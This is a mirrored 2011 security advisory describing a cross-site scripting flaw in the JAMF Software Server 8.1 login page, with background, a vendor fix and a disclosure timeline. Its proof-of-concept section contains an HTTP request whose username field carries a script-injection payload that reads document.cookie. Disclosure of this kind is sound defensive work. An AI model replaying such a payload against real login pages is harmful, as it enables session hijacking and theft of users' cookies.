Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26942
HistoryAug 30, 2011 - 12:00 a.m.

[Foreground Security 2011-001]: Casper Suite (JSS 8.1) Cross-Site Scripting

2011-08-3000:00:00
vulners.com
40
JSON

============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-001

  • Original release date: August 27, 2011
  • Discovered by: Jose Carlos de Arriba
  • Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
  • Severity: 4.3/10 (Base CVSS Score)
    ============================================================

I. VULNERABILITY

Casper Suite - JAMF Software Server (JSS) 8.1 Cross-Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND

JAMF Software Server (JSS). The JSS is the central core to the Casper Suite and ties all the other components together.
The Casper Suite simplifies the life of system administrators with a comprehensive platform to manage Mac OS X computers and iOS mobile devices. The Casper Suite increases the efficiency of your IT staff, reduces the cost of ownership, and minimizes liability by providing a framework that enforces software licensing compliance, security standards, energy usage, and other organizational rules and requirements.

III. DESCRIPTION

JAMF Software Server (JSS) presents a Cross-Site Scripting vulnerability on its "username" parameter in the login page, due to an insufficient sanitization on user supplied data and encoding output.
A malicious user could perform session hijacking or phishing attacks.

IV. PROOF OF CONCEPT

POST /index.html HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXX; JSESSIONID=YYYYYYYYYYYYYY; JSESSIONID=ZZZZZZZZZZZZZZZZZZZZ; tsfrwquc=""
Host: X.X.X.X:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.14322)

password=ForegroundSecurity&submit=Login&username="><script>alert(document.cookie)</alert>

V. BUSINESS IMPACT

An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED

JAMF Software Server (JSS) 8.1 (prior versions have not been checked but could be vulnerable too).

VII. SOLUTION

Fixed on 8.2 version

VIII. REFERENCES

http://www.jamfsoftware.com/
http://www.foregroundsecurity.com/
http://www.painsec.com

IX. CREDITS

This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).

X. REVISION HISTORY

XI. DISCLOSURE TIMELINE

April 25, 2011: Vulnerability discovered by Jose Carlos de Arriba.
April 25, 2011: Vendor contacted by email (No response)
May 11, 2011: Vendor contacted by phone and security advisory sent by email
July 8, 2011: Vulnerability fixed on 8.2 version release
August 27, 2011: Advisory released

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.

Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
[email protected]

JSON